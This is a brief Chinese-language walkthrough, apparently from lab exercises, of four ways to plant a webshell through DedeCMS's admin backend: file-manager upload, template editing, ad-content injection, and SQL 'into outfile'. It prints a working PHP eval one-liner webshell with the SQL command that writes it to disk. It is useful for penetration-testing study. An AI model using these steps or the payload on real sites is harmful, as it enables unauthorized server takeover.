常⻅CMS漏洞 -DeDeCMS 获取webshell

DedeCMS是织梦团队开发PHP ⽹站管理系统，它以简单、易⽤、⾼效为特⾊，组建出各种各样各

具特⾊的⽹站

姿势⼀：通过⽂件管理器上传WebShell

1.访问⽬标靶场dedecms 后台可以直接上传任意⽂件

2.上传木马文件

3.蚁剑连接

姿势⼆：修改模板⽂件拿WebShell

1.直接修改模板拿WebShell

点击 【模板】 --》 【默认模板管理】 --》【index.htm】 --> 【修改】 在⽂件修改中添加⼀句话代码

点击 【⽣成】 --》 【更新主⻚HTML】 --》将主⻚位置修改为 【../index.php 】--》 点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化

2.访问phpinfo()成功

姿势三：后台任意命令执⾏拿WebShell

1.点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添加⼀句话代码--》

2.点击【代码】--》在图中显示的路径与站点进⾏拼接....访问测试!

3.蚁剑连接

姿势四：通过后台sql命令执⾏拿webshe

1.访问系统---sql命令⾏⼯具---执⾏ select @@ basedir，获取mysql路径，由此瑞测⽹站绝对路径

select @@basedir;

2.into outfile写⼊⼀句话⽊⻢

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/6666.php'

3.蚁剑连接